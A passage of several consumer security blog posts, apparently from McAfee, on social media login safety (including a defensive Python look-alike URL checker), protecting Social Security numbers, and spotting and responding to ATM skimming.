    • Look-alike domains such as faceboook.com (extra “o”), facebook-login.com, fb-support.com.
    • Subdomain tricks that hide the real domain such as https://facebook.com.login-security-check.ru.
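    The right-to-left rule above can be made precise in code. The following Python checker is an added example for this article, not McAfee’s code: it extracts the real (registrable) domain from a login URL, compares it against the site you intend to log into, and flags the two scam patterns listed above, the look-alike spelling and the trusted name buried in a subdomain. The trusted domain facebook.com comes from the text; the short list of public suffixes is a constructed stand-in for the full Public Suffix List, and the sample URLs are constructed from the patterns described.

```python
from urllib.parse import urlsplit

# Constructed for this example: the site the reader expects to log into.
TRUSTED_DOMAINS = {"facebook.com"}

# Constructed, deliberately short public-suffix list. A production checker
# would load the Public Suffix List (publicsuffix.org); this is an assumption.
PUBLIC_SUFFIXES = {"com", "net", "org", "ru", "co.uk"}


def registrable_domain(hostname):
    """Return the 'real' domain: the public suffix plus one label to its left.

    This is the text's right-to-left rule made precise: for
    security.facebook.com it yields facebook.com, while for
    facebook.com.login-security-check.ru it yields login-security-check.ru.
    """
    labels = hostname.lower().rstrip(".").split(".")
    # Scanning from the left finds the longest listed suffix first
    # (so co.uk wins over uk when both are listed).
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return ".".join(labels)


def edit_distance(a, b):
    """Levenshtein distance, used to spot typo-squats such as faceboook."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_login_url(url, trusted=TRUSTED_DOMAINS):
    """Classify a login URL as trusted, caution, look-alike or untrusted."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    reasons = []
    if parts.scheme != "https":
        reasons.append("connection is not HTTPS")

    if domain in trusted:
        verdict = "trusted" if not reasons else "caution"
        return {"host": host, "domain": domain, "verdict": verdict, "reasons": reasons}

    sld = domain.split(".")[0]  # the label just left of the public suffix
    lookalike = False
    for t in trusted:
        t_sld = t.split(".")[0]
        if t in host:
            # The subdomain trick: the trusted name is present, but only as a prefix.
            reasons.append(f"'{t}' appears in the hostname, but the real domain is '{domain}'")
            lookalike = True
        elif t_sld in sld or edit_distance(sld, t_sld) <= 2:
            # Typo-squats (an extra 'o') and padded names (facebook-login).
            reasons.append(f"'{sld}' resembles the trusted name '{t_sld}'")
            lookalike = True
    verdict = "look-alike" if lookalike else "untrusted"
    return {"host": host, "domain": domain, "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    # Sample URLs constructed from the patterns described in the text.
    for u in ["https://www.facebook.com/login", "https://security.facebook.com",
              "https://facebook.com.login-security-check.ru", "https://faceboook.com",
              "https://facebook-login.com", "https://fb-support.com",
              "http://www.facebook.com"]:
        r = check_login_url(u)
        print(f"{r['verdict']:<11} {u}  ->  real domain: {r['domain']}")
```

    Two caveats worth knowing when applying the same rule by eye: a correct domain reached over plain http still deserves caution, which is why the checker reports it separately, and a domain spelled with look-alike characters from another alphabet is not caught by a string comparison, so if your browser shows an unfamiliar “xn--” address, treat it like a misspelling.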

    13. Be cautious of anything that requires an additional login.

    Within the social media platform, scammers often insert a “second” sign-in step to capture your credentials. A common trick is sending you to a page that looks like a normal email, business, or bank website but then suddenly asks you to log in again “to continue,” “to verify your identity,” or “because your session expired.” That extra login prompt is frequently a fake overlay or a malicious look-alike page designed to steal passwords.

    Clicking a shared document link, viewing a receipt, or checking a delivery status usually shouldn’t require you to re-enter your email and password—especially if you’re already signed in elsewhere. Another example is a fake security notification claiming your account has been compromised, directing you to another page or website that requires a new login. Attackers usually rely on urgency, panic, and habit; you might be so used to logging in all the time, that you could do it automatically without noticing the context is wrong.

    A safer habit is to stop and reset the flow. If something unexpectedly asks for another login, don’t use the embedded prompt. Instead, open a new tab, type the site’s official address yourself, check account status, and log in there if needed. If the request was legitimate, it will still work once you’re signed in through the official site; if it was a trap, you’ve just avoided handing over your credentials.

    14. Make sure your security suite is up to date.

    Your suite should include an antivirus, anti-spyware, anti-spam, a firewall, and a website safety advisor. Keeping your security suite up to date is essential as threats evolve daily, and outdated protection can miss new malware, phishing kits, ransomware variants, and scam techniques. Updates also patch security weaknesses in the software itself, improve detection technologies, and add protections for newer attack methods.

    The McAfee Social Privacy Manager extends “security updates” beyond your device and into your social media footprint by scanning your privacy settings across supported platforms, flagging exposures, and recommending safer configurations. Because social platforms frequently change their settings and defaults, Social Privacy Manager also needs to stay updated to recognize and apply the right privacy protections.

    15. Invest in identity theft protection.

    Regardless of how careful you may be or any security systems you put in place, there is always a chance that you can be compromised in some way. It’s nice to have identity theft protection watching your back.

    McAfee+ combines everyday device security with identity monitoring in one suite. Depending on the plan, McAfee+ can watch for your personal info on the dark web and breach databases, monitor financial and credit activity, and send real-time alerts for anomalies. The Advanced and Ultimate plans add wider support such as credit monitoring and tracking for bank or investment accounts, as well as tools that reduce your exposure such as Personal Data Cleanup that removes your info from data broker sites. It doesn’t just warn you after a breach; it helps shrink the chances your data gets misused in the first place.

    Final thoughts

    Social media brings incredible opportunities, but privacy exposure, scams, and account takeovers remain real challenges that can impact your finances, reputation, and personal security. The tips outlined above give you practical ways to recognize the risks and protect your social media accounts. By raising your level of awareness and applying safe social media practices, you are building a stronger defense against evolving threats.

    Make security a family affair by sharing these safe social media practices with everyone in your household—especially children and teens who use social media—so they can enjoy a safer experience.

    The post 15 Critical Tips to Stay Safe on Social Media appeared first on McAfee Blog.

    Smart Ways to Keep Your Social Security Number from Being Cracked

    By: McAfee

    A determined cybercriminal can find ways to guess or predict an individual’s Social Security number, which increases the risk of identity theft for all of us.

    In 2009, researchers from Carnegie Mellon University revealed a reliable method for predicting Social Security numbers using information from social networking sites, data brokers, voter registration lists, online white pages, and the publicly available Social Security Administration’s Death Master File.

    Originally, the first three numbers on a Social Security card represented the state in which a person had initially applied for their card. Numbers started in the Northeast and moved westward. This meant that people born on the East Coast were assigned the lowest numbers and those born on the West Coast were assigned the highest numbers. Before 1986, people were rarely assigned a Social Security number until age 14 or so, since the numbers were used for income tracking purposes.

    The Carnegie Mellon research

    The Carnegie Mellon researchers were able to guess the first five digits of a Social Security number on their first attempt for 44% of people born after 1988. For those in less populated states, the researchers had a 90% success rate. In fewer than 1,000 attempts, the researchers could identify a complete Social Security number, “making SSNs akin to 3-digit financial PINs.” The researchers concluded, “Unless mitigating strategies are implemented, the predictability of SSNs exposes people born after 1988 to risks of identity theft on mass scales.”

    To address this security gap, the Social Security Administration in 2011 changed the way SSNs are issued by randomizing number assignment to make predicting patterns more difficult. While this is certainly an accomplishment, the potential to predict Social Security numbers is the least of our problems. Social Security numbers can be found in unprotected file cabinets and databases in thousands of government offices, corporations, and educational institutions, exposing people to identity theft and other related risks. With the growing losses from all identity theft cases, protecting SSNs is a serious concern.

    Your SSN: It’s more than a string of numbers

    Your Social Security number might be only nine digits, but in the wrong hands, it can act like a master key that unlocks far more. It can reveal details about your life, serving as a powerful linking tool for cybercriminals to access or verify other personal details and build a more comprehensive profile of your identity.

    • Credit and financial information: When combined with other identity elements, such as your name and address, your SSN can help criminals access your credit reports and financial accounts. Fortunately, legitimate financial institutions require multiple forms of verification beyond your SSN, including security questions, account numbers, and authentication codes sent to your registered devices.
    • Government benefits access: Your SSN serves as a key identifier for Social Security benefits, Medicare, unemployment claims, and tax refunds. Criminals may attempt to file fraudulent claims using your SSN, but the Social Security Administration has implemented stronger identity verification requiring additional documentation and in-person visits for many services.
    • Employment records: While your SSN identity theft risk includes employment fraud, most employers now use E-Verify and require physical documentation such as driver’s licenses and passports. Your SSN alone typically isn’t enough for someone to successfully impersonate you for employment, though it can be part of a broader identity theft scheme.
    • Medical records and insurance: Healthcare providers use SSNs to verify insurance coverage and access medical histories. Criminals have attempted medical identity theft, but most healthcare systems now require photo ID, insurance cards, and often biometric verification to access sensitive medical information and services.

    Your stolen SSN could be on the dark web

    Your Social Security number is one of your most private identifiers, but in today’s data economy, it can quietly slip into criminal marketplaces on the dark web. Even if you’re careful with your information, you can’t control how organizations protect the data they collect from you. These exposures often result from data breaches, scams, or systems you had to trust — employers, hospitals, banks, schools, and even government agencies. When your SSN shows up there, it’s usually bundled with your other information—name, birthdate, address—making it far more valuable and dangerous than a random number on its own.

    Being familiar with the common paths that take your SSN to the dark web will help you recognize and avoid the risks earlier, and act fast if your information is ever compromised.

    • Third-party data breaches: Your SSN could end up on the dark web when companies, healthcare providers, or government agencies you’ve shared it with experience security breaches. Recent high-profile incidents have exposed millions of records, including major credit reporting agencies and healthcare systems.
    • Device malware and info-stealing attacks: Cybercriminals use sophisticated malware that can capture data as you type, including Social Security numbers entered on tax forms, job applications, or financial websites. Banking trojans and keyloggers specifically target sensitive information for sale on illicit markets.
    • Phishing schemes and social engineering: Scammers impersonate trusted organizations like the IRS, your bank, or employers and create convincing fake websites, emails, or phone calls that trick you into “verifying” your SSN. They will claim your SSN has been “suspended” or “compromised,” threaten you with arrest or legal action, or request to verify your SSN for any reason. Pressure tactics and demands for immediate action are classic red flags.
    • Compromised data brokers: Data brokers legally collect and sell personal information, gathered from public records, social media, and other sources, creating comprehensive profiles that become valuable targets for cybercriminals. When their systems are breached, your SSN and other details can be exposed.
    • Social engineering of service providers: Criminals sometimes target employees at companies that handle your information, manipulating them to gain unauthorized access to customer records. Call center representatives, healthcare workers, or government employees may be tricked into providing access to systems containing SSNs.
    • Account takeovers: Account takeovers occur when criminals gain access to your existing accounts through stolen passwords, security question answers, or two-factor authentication bypasses. Once inside accounts at financial institutions, healthcare providers, or government services, they can view stored SSNs or use account access to request more information.
    • Mailbox theft: Physical mail theft remains a surprisingly effective way for criminals to obtain documents containing your SSN. Tax documents, insurance statements, pre-approved credit offers, and government correspondence often contain complete or partial Social Security numbers that help criminals piece together your identity.
    • Public records: Public records databases, court filings, property records, and voter registration information sometimes contain complete or partial SSNs. While efforts have been made to remove SSNs from public records, older documents and some current filings may still expose this information.

    The doors that open with your Social Security Number

    Once criminals have your SSN, they can do a range of fraudulent activities that can compromise your relationships, health, career, financial standing, and even your freedom. A single SSN can fuel everything from credit and loan scams to tax fraud, medical identity theft, and even long-term schemes like synthetic identities. Here are some examples:

    • New account fraud: Criminals could use your SSN and other personal information to open credit cards, loans, or bank accounts in your name. This can destroy your credit score and leave you responsible for fraudulent debt that can take years to resolve.
    • Tax refund fraud: Scammers file fake tax returns using your SSN to claim your refund before you file your legitimate return. This leaves you dealing with IRS complications and delays in receiving your actual refund, often extending into the following tax year.
    • Medical identity theft: When someone uses your SSN to receive medical care, prescription drugs, or submit insurance claims, it can contaminate your medical records with incorrect information and exhaust your insurance benefits. This puts your health at risk and can result in thousands in fraudulent medical bills.
    • Government benefits fraud: Criminals apply for unemployment benefits, Social Security benefits, or other government assistance using your SSN. This complicates your own eligibility and creates tax complications when benefits are reported under your name.
    • Employment fraud: Someone may use your SSN for employment, which means their income gets reported to the IRS under your name, potentially affecting your tax liability and Social Security benefits calculation. You might receive unexpected tax documents or face complications with the IRS over unreported income you never earned.
    • SIM swap setup: Your SSN serves as a verification tool when criminals attempt to transfer your phone number to their device, giving them access to two-factor authentication codes and potentially your financial accounts. This can lead to rapid-fire account takeovers across multiple platforms.
    • Synthetic identity creation: Fraudsters combine your real SSN with fake names and addresses to create entirely new identities for long-term fraud schemes. These synthetic identities can build credit over time, making the fraud harder to detect and potentially more damaging when discovered.

    Verify and block anyone using your Social Security Number

    Social Security identity theft isn’t always obvious right away. In many cases, people don’t realize their SSN has been compromised until weeks or months later. If you want to know if your SSN has been misused, there are clear warning signs and reliable ways to check. By reviewing a few key records, you can spot red flags early and shut down fraud before it snowballs into a long, expensive recovery process.

    1. Check your credit reports: Request your free annual credit reports from federally authorized sources. Look for accounts you didn’t open, credit inquiries you didn’t authorize, or addresses you’ve never lived at. You’re entitled to one free report from Experian, Equifax, or TransUnion every 12 months, so stagger them quarterly for ongoing monitoring.
    2. Set up fraud alerts and credit monitoring: Place a fraud alert with any of the three credit bureaus to require creditors to verify your identity before opening new accounts. Consider setting up account alerts with your bank and credit card companies as well to notify you of unusual activity. These notifications can catch SSN identity theft early before damage occurs.
    3. Review your Social Security Administration account: Create or log into your Social Security account to check your earnings history and benefit statements. Look for employment or earnings you don’t recognize, as criminals often use stolen SSNs for work authorization. Any discrepancies could indicate someone is using your SSN for employment fraud.
    4. Examine IRS documents and consider an IP PIN: Check your annual Social Security Statement for accuracy and review any IRS letters about duplicate tax filings or suspicious activity. If you suspect SSN details leaked, request an Identity Protection PIN (IP PIN) from the IRS or tax transcripts through the IRS Get Transcript portal.
    5. Monitor medical statements and insurance claims: Review your health insurance statements, Medicare summaries, and medical bills for services you didn’t receive or providers you’ve never visited. Medical identity theft using your SSN can result in incorrect information in your medical records and unexpected bills. Contact your insurance company immediately if you spot unfamiliar claims or treatments.
    6. Check for unemployment and government benefits fraud: Contact your state’s unemployment office to verify that no claims were filed in your name. Review any government benefit accounts you have as well for suspicious activity.
    7. Conduct a comprehensive identity audit: Search your name combined with personal details online to see if your information appears on data broker sites. Set up ongoing dark web monitoring through reputable services to alert you if your SSN appears in future breaches.

    Your first steps to stop the fraudulent activity

    If you discover that someone has been using your SSN, take these steps immediately:

    1. Freeze your credit: Contact all three major credit bureaus to place a free credit freeze on your accounts. This prevents anyone from opening new credit accounts in your name. Keep your PINs safe, as you’ll need them to lift the freeze temporarily when applying for credit.
    2. File an identity theft report: Report the SSN theft to the Federal Trade Commission. The FTC’s step-by-step, personalized guidance will help you navigate the recovery process and provide documentation for creditors and other institutions.
    3. Contact affected financial institutions: Notify your bank, credit card companies, and other financial institutions where you have accounts. Request new account numbers, cards, and fraud alerts to monitor for suspicious activity.
    4. Secure your Social Security Administration account: Create or secure your my Social Security account to prevent fraudsters from creating one in your name. Enable two-factor authentication and review your earnings record for any unauthorized employment. If someone is already using your SSN for work, contact the SSA immediately to report the misuse.
    5. Document everything: Keep detailed records of all communications, including dates, names of representatives, reference numbers, and actions taken. Create a file with copies of all reports, correspondence, and documentation. This paper trail will be invaluable if you need to dispute fraudulent accounts or prove your case to creditors and law enforcement.
    6. Stay vigilant and follow up: Monitor your credit reports, bank statements, and government benefits regularly for at least the next 12 months. The effects of SSN theft can surface months later, so ongoing monitoring is crucial for your long-term financial security.

    Long-term, preventive measures to limit your exposure

    Since your SSN can’t be easily changed and is still treated like a universal ID, the safest approach is to put up barriers that make it harder for criminals to use, even if they get it. Aside from the steps listed above, here are additional measures you can follow to protect your SSN from the start:

    • Minimize sharing your SSN: Only provide your SSN when absolutely required by law or for essential services such as banking, employment, or medical care.
    • Ask for alternatives: Many organizations request your Social Security number out of habit. Ask if you can use an alternative identifier, such as a driver’s license number.
    • Be cautious with Social Security number requests over the phone or email: Legitimate organizations rarely ask for your full SSN via phone or email. When in doubt, hang up and call the organization directly using a number from their official website to verify the request.
    • Use strong, unique passwords: Since details leaked in data breaches can help criminals predict Social Security numbers and crack passwords, it is best to protect all your accounts with complex, unique credentials using a password manager.
    • Enable two-factor authentication: Add an extra layer of security to your Social Security Administration, IRS, banking, and credit accounts by setting up two-factor or multi-factor authentication, which blocks 99% of automated attacks.
    • Keep your devices and software updated: Install security updates promptly on all devices. Malware often targets personal information, including Social Security numbers, so staying current with patches protects your data from the latest threats.
    • Shred physical documents: Physical theft remains a common way criminals obtain Social Security numbers. So before throwing away tax returns, medical records, or financial statements, put them through a cross-cut shredder.
    • Monitor your credit reports and account statements: Check for unauthorized accounts or inquiries that could indicate SSN misuse. Request free credit reports and review bank and credit card statements monthly.
    • Consider additional protections: Consider enrolling in credit monitoring services and identity theft protection. These services can alert you to other types of SSN identity theft, such as employment fraud or medical identity theft.

    FAQs about Social Security Numbers

    When can organizations legally request my SSN?

    Federal law requires SSN disclosure in specific situations. Organizations can legally require your SSN when no reasonable alternative exists and when they have a specific legal requirement or legitimate business need, such as:

    • Tax reporting: Employers, financial institutions, and others who must file tax documents with the IRS
    • Credit checks: Lenders, landlords, and others performing background or credit verification
    • Government benefits: Social Security, Medicare, unemployment, and other federal or state programs
    • Legal compliance: Situations where federal or state law specifically mandates SSN collection

    What notices are organizations required to present when requesting my Social Security number?

    When an organization requests your SSN, they must provide what’s called a disclosure statement, a Privacy Act requirement explained in guidance from the Department of Justice’s Office of Privacy and Civil Liberties. Legitimate organizations requesting your SSN must tell you:

    • Whether providing your SSN is mandatory or voluntary
    • What legal authority permits them to request it
    • How they plan to use your SSN
    • What happens if you refuse to provide it

    If an organization can’t provide clear answers to these questions, that’s a red flag. The FTC’s consumer guidance emphasizes that you have the right to understand why your SSN is needed before you provide it.

    When can I decline to provide my SSN?

    You can typically decline when it’s not a necessity, alternative identification exists, it seems excessive, and there is no clear legal requirement. Common situations where you can often say no include gym memberships, retail purchases, job applications that don’t require credit checks, and various service sign-ups.

    What are safer alternatives to SSN disclosure?

    When you need to verify your identity but want to minimize SSN exposure, several alternatives can work depending on the situation:

    • Individual Taxpayer Identification Numbers
    • Driver’s license numbers
    • Partial SSN disclosure
    • Alternative methods such as bank statements, utility bills, or other documents

    Final thoughts

    While it’s concerning that Social Security numbers can be predicted or leaked through data breaches, you’re not powerless against SSN identity theft. The practical steps we’ve outlined put you firmly in control of your personal information security—from placing credit freezes and setting up IRS IP PINs to securing your Social Security Administration account with strong authentication. Take action today by implementing these protective measures to reduce your risk significantly.

    For added security, consider a McAfee Identity Protection plan to experience proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your financial accounts.

    The post Smart Ways to Keep Your Social Security Number from Being Cracked appeared first on McAfee Blog.

    Essential Tips to Avoid ATM Skimming

    By: McAfee

    With the rise in digital banking and online transactions, the number of automated teller machines (ATMs) worldwide declined to 2.95 million in 2025, according to the finance and crypto resource site CoinLaw. Despite this decline, ATM fraud continues to victimize innocent consumers, with global losses estimated at $2.4 billion in 2025.

    Among the ATM-related security issues, card skimming accounted for almost 60% of all reported global ATM fraud cases in 2025, according to CoinLaw. Other ATM-related security threats include malware (21%) and cryptocurrency ATM scams. AI-driven ATM fraud, although still in its infancy (0.11% in 2025), is gaining traction as cybercriminals develop new phishing techniques.

    In this guide, we will explore some of the security threats associated with ATMs, with a focus on skimming, and provide tips on protecting your data and money in your bank account.

    What is ATM skimming?

    ATM skimming is a form of payment card fraud where criminals secretly install illegal devices on card readers, fuel pumps, or point-of-sale terminals, which then steal your debit or credit card information. These devices, called skimmers, capture the magnetic stripe data from your card while hidden cameras or fake PIN pads record your personal identification number. With both pieces of information, criminals can create counterfeit cards or make unauthorized online purchases using your account.

    Skimming devices have become increasingly sophisticated and harder to detect. Traditional overlay skimmers sit on top of legitimate card readers, but newer “shimmer” devices are inserted more deeply into the card slot, making them virtually invisible to casual inspection. These devices can store data from hundreds of cards before criminals retrieve them, often using Bluetooth technology to wirelessly download stolen information without physically accessing the skimmer.

    ATMs remain the most common target for skimming attacks, but criminals also target gas station fuel pumps, which often have weaker security systems and less frequent maintenance checks. Point-of-sale terminals at retail locations, restaurants, and other businesses also present opportunities for skimming, particularly when employees are involved in the scheme.

    The threat persists for several interconnected reasons. Payment card fraud is quite a profitable business and can be scaled across states or countries. Technology gaps also contribute to the problem, as many ATMs and payment terminals continue to use legacy magnetic stripe technology despite the introduction of more secure EMV chips in newer cards. Criminals also exploit legacy systems, especially if the ATM does not receive regular security updates.

    Additionally, decommissioned ATMs can be freely gathered from junkyards or casually bought from online marketplaces, giving criminals the chance to collect personal data stored in the computer and study the discarded machine’s security features to improve their skimming techniques.

    In some cases, used ATMs are purchased on eBay or Craigslist and then installed in areas with ample foot traffic. These machines, which can be powered by car batteries or simply plugged into a nearby outlet, are programmed to read and copy credit card data.

    Consequences of skimming

    When your card information is compromised through skimming, the financial and personal consequences can be significant. Criminals may drain your account through ATM withdrawals or fraudulent purchases, potentially leaving you unable to access your own money. Since debit card transactions often clear immediately, unauthorized withdrawals can cause overdraft fees and bounced check charges before you even realize your account has been compromised.

    Beyond the financial losses, ATM skimming can lead to identity theft, where the personal information captured becomes part of larger criminal databases used in other fraud schemes.

    Consequently, your credit score and banking relationships may also suffer if fraudulent accounts are opened in your name or if you’re unable to resolve unauthorized charges quickly. While the law gives you limited liability for fraudulent transactions, the process of restoring your accounts can be time-consuming and stressful.

    Types of ATM skimming devices and how to spot them

    Criminals use a range of devices—some obvious, others nearly invisible—to steal card data and PINs right at the machine. Knowing the main types of skimmers, what they look like, and where they’re usually placed can help you recognize them and avoid a compromised ATM.

    Overlay card readers

    The most common type of skimming device, overlay card readers are fake attachments that criminals place directly over the legitimate card slot of an ATM. As you insert your card, it passes through the skimmer first, which captures the magnetic stripe data from your card before it reaches the actual card reader.

    Deep-insert or shimmer devices

    An evolution of skimming technology, shimmer devices are extremely thin circuit boards that criminals insert deep into the card slot, making them nearly impossible to detect through visual inspection alone. When you insert your card, you might notice increased resistance, unusual vibrations, or your card feeling momentarily stuck.

    Pinhole cameras

    Criminals use tiny cameras to capture your PIN as you enter it on the keypad. They are so small they can be hidden in seemingly innocent locations around the ATM. Look for a small camera attached to the top of the screen, hidden in a brochure holder, or even concealed in a fake security sign.

    Fake PIN pads

    These devices are placed over the legitimate ATM keypad to capture your PIN as you enter it. The keypad may feel spongier than usual, have a different texture, or seem thicker than normal. You might notice the numbers are printed differently, the buttons don’t press down as far as expected, or there’s a slight color difference between the keypad and the rest of the ATM. If the keypad feels loose, raised, or different from other ATMs you’ve used, don’t enter your PIN.

    Bluetooth-enabled skimmers

    Considered an advanced skimming technique, Bluetooth-enabled skimmers wirelessly transmit your stolen card and PIN data to criminals, eliminating the need for them to return to retrieve the device. You could detect them by checking your phone’s Bluetooth settings for unusual device names appearing in the area, though many criminals use generic names to avoid detection. If you notice people loitering near ATMs with mobile devices, especially if they seem to be monitoring ATM users, this could indicate that a Bluetooth skimming operation is in progress.

    Combination attacks

    Criminals often combine multiple types of skimming devices to maximize their data capture. A typical combination attack might involve an overlay card reader paired with a pinhole camera, or a shimmer device combined with a fake PIN pad. This is why security experts recommend following all protective measures when you use an ATM.

    Emerging technologies

    Recent advances in skimming technologies include devices that can be inserted through existing openings in ATMs without requiring external attachments, as well as skimmers that use near-field communication (NFC) technology to capture contactless payment information.

    Protective steps to take before inserting your ATM card

    Choose bank-operated ATMs in well-lit areas

    Your safest bet is to use ATMs inside bank branches or those clearly operated by major financial institutions. These locations have better security measures, such as surveillance cameras and regular checks that detect tampering. At outdoor ATMs, select machines in well-lit, high-traffic areas where criminal activity is less likely to occur unnoticed. Avoid ATMs in dimly lit, isolated locations where skimmers can be easily installed.

    Examine the card slot

    Before inserting your card, closely inspect the card insertion slot. Legitimate ATM card readers should have a uniform appearance with smooth edges and consistent coloring. Look for unusual attachments or devices that seem to have been added on top of the original reader. The card slot should align perfectly with the surrounding ATM fascia. Any gaps, misalignments, or signs that something has been glued or attached should raise immediate red flags. Trust your gut.

    Perform the wiggle test

    One of the most effective ways to detect fake card readers on ATMs is through tactile inspection. Gently grasp the card reader and try to wiggle it. A legitimate card reader should feel solid and permanently attached. If the reader or the housing feels loose, this is a strong indicator of a skimmer. If anything moves when it shouldn’t, do not use that ATM and report it to the bank immediately.

    Inspect the keypad

    Examine the keypad carefully for any signs of modification or overlay devices. Overlay keypads often appear slightly thicker or misaligned with the surrounding area. When pressing the buttons, each one should have consistent resistance and feel. Any button that sticks or seems higher than others could indicate tampering. Pay attention to the area around the keypad for adhesive residue or scratches. Legitimate ATM keypads have consistent button spacing, uniform coloring, and should feel solid when pressed.

    Check the ATM’s fascia and bezel

    The ATM’s outer casing and bezel should have a uniform appearance with no obvious modifications such as loose panels, extra pieces of plastic, or areas with different coloring or texture from the rest of the machine. Check for any unusual wiring, small cameras, or devices that appear out of place. The area around the screen should be examined for any tiny cameras or recording devices that capture PIN entry. All text, logos, and branding should appear professional and consistent with the bank’s standard ATM design.

    Survey the surrounding area

    Before using any ATM, check the area for any unusual objects that could house cameras or recording equipment, including fake brochure holders, unusual signage, or any items that seem out of place. Check for people loitering nearby who seem to be watching ATM users or vehicles parked unusually close to outdoor ATMs with passengers or drivers who appear to be monitoring ATM activity.

    Scan for Bluetooth devices

    Before using an ATM, check your smartphone's Bluetooth settings to scan for nearby devices with suspicious names, such as those with generic or random characters, or names that don't correspond to legitimate businesses in the area. An unusual concentration of unknown devices near an ATM could be a warning sign. This technique works best in areas where there are typically few Bluetooth devices, such as standalone ATMs. A clean scan does not mean the ATM is safe, since not every skimmer advertises itself over Bluetooth, so still perform the physical checks above.

    ATM safety tips

    Enable and use contactless withdrawal

    Many banks offer cardless or contactless ATM withdrawals: you authenticate and approve the withdrawal in the bank's mobile app, then tap your phone on the ATM's near-field communication (NFC) reader or scan a QR code shown on the screen. Your card never enters the slot, so there is nothing for an overlay reader or shimmer to capture, and you get the same convenient access to your funds. Contact your bank to learn about contactless ATM options and how to activate these features on your accounts.

    Verify ATM authenticity through official channels

    Bank websites or mobile apps usually show the locations of their legitimate ATMs. If you’re unsure about an ATM’s authenticity, check these official resources to confirm the machine is listed as a legitimate location. This step can help you avoid both skimming devices and other fraudulent ATM operations entirely. Be particularly cautious of ATMs in unusual areas. When traveling, stick to ATMs inside recognizable financial institutions.

    Shield your PIN entry

    Even when ATMs appear legitimate, always protect your PIN entry from potential observation. Use your free hand, body, or a purse to cover the keypad while entering your PIN to guard against both hidden cameras and shoulder-surfing by nearby criminals. Consider changing your PIN regularly and never write it down. If you suspect your PIN may have been compromised, change it immediately through secure channels.

    Monitor your account activity vigilantly

    Implement robust account monitoring to detect and address any skimming-related fraud as quickly as possible. Set up real-time account alerts through your bank’s mobile app to receive immediate notifications of all transactions. Review your account statements regularly and report any unauthorized activity immediately. Consider setting daily withdrawal limits to match your usage patterns to minimize losses if your card information is compromised.

    Report suspicious ATMs immediately

    If you notice signs of tampering or suspicious activity at an ATM, report it immediately to the bank to protect other customers from becoming victims and to help law enforcement track down the perpetrators. Contact the bank’s customer service line using the phone number on the back of your card, rather than the numbers displayed on the potentially compromised ATM. Document the ATM’s location, including the address and any identifying numbers or codes visible on the machine.

    Stay informed about ATM fraud trends

    Stay informed about the latest ATM skimming techniques and prevention strategies through reputable sources. Consumer alerts provide updated guidance on protecting yourself from these crimes, as do major credit card networks such as Visa and Mastercard. Following your bank’s security updates and fraud alerts helps you stay aware of new threats in your area and emerging criminal techniques to watch for during ATM transactions.

    Avoid assistance from strangers

    Be highly cautious of anyone offering to help you with ATM troubles, even if they appear well-intentioned, especially if they suggest using their phone to call the bank or offer to show you how to complete your transaction. If you encounter problems with an ATM, cancel your transaction, retrieve your card, and contact your bank directly.

    Use ATMs during daylight or banking business hours

    Criminals usually install skimming devices when fewer people are around to witness their actions. Daytime transactions in high-traffic areas increase the likelihood of suspicious behavior being noticed and reported. If you must use an ATM at night, choose one in a well-lit area with good visibility, preferably near businesses that are still open and have staff and customers present. Consider using indoor ATMs exclusively.

    Keep your ATM receipts secure

    Always take your ATM receipts and store them securely until you have verified the transaction on your statement. Don’t leave them at the machine or throw them away in nearby trash cans where criminals might retrieve them to gather information about your account; even partial account numbers and transaction details could be useful to identity thieves. You can shred the receipts once you’ve confirmed the transactions.

    Understand your rights and protections

    Familiarize yourself with your bank's policies regarding ATM fraud and your rights under federal law. The Electronic Fund Transfer Act provides specific protections for consumers who experience unauthorized ATM and debit card transactions. Reporting within two business days of learning about the loss provides the strongest protection; reporting within 60 days of the date your bank sent the statement showing the unauthorized transaction still limits your liability, but waiting longer than that can leave you responsible for the full amount.

    Plan your cash needs in advance

    Reduce your ATM usage by planning your cash needs and making larger, less frequent withdrawals to reduce your overall exposure to potential skimming attempts. Consider getting cash back during purchases at grocery stores, pharmacies, and trusted retailers, rather than using unfamiliar ATMs, especially when traveling or in unfamiliar areas.

    Be extra vigilant during the holiday season

    ATM skimming attempts surge during peak shopping and travel periods when foot traffic increases at malls, airports, hotel lobbies, and other commercial or tourist locations. Increased cash withdrawals, crowded shopping areas, and travelers using unfamiliar ATMs create ideal conditions for skimming operations. In addition, criminals know that holiday shoppers are often distracted, rushed, and less vigilant about using ATMs. That’s why it’s important for you to be extra cautious. If you must use an ATM, take a breath and slow down to thoroughly inspect the machine and your surroundings before inserting your card.

    Immediate steps to take if your card was skimmed

    The guidance below walks you through exactly what to do in the moment and right after, so you can limit risk to yourself and prevent others from becoming victims, too.

    1. Contact your bank immediately. Call the number on the back of your card or use your bank’s mobile app to report unauthorized transactions. Most banks have 24/7 fraud hotlines that can freeze your account within minutes to prevent further unauthorized use.
    2. Dispute unauthorized charges promptly. Your liability protections depend on how quickly you report fraud. For credit cards, federal law limits your liability to $50 for unauthorized charges, and most card networks waive even that. For debit cards, report the problem within two business days of learning about it to limit liability to $50; if you report later but within 60 days of the date the bank sent the statement showing the unauthorized transaction, liability is capped at $500. After that 60-day window, you could be responsible for all unauthorized transactions that occurred after it.
    3. Request a replacement card. Your bank will cancel your compromised card and issue a new one with different numbers. Most banks can expedite delivery within 1-2 business days, though some may charge a fee for rush delivery. Ask about temporary digital cards for immediate online use while waiting for your physical card.
    4. Inform your ID Theft protection provider. If you have an identity theft protection subscription, inform your service to activate proactive identity surveillance, monitor your credit and personal information, and seek support from fraud resolution agents who can work through the process of resolving the identity theft issues.
    5. Place a fraud alert on your credit reports. Contact one of the three major credit bureaus—Experian, Equifax, or TransUnion—to place a free fraud alert. This alert requires creditors to verify your identity before opening new accounts and automatically applies to all three bureaus for one year.
    6. Consider a credit freeze for enhanced protection. A credit freeze prevents new creditors from accessing your credit report and identity thieves from opening accounts in your name. You can freeze and unfreeze your credit for free with all three bureaus online, by phone, or by mail.
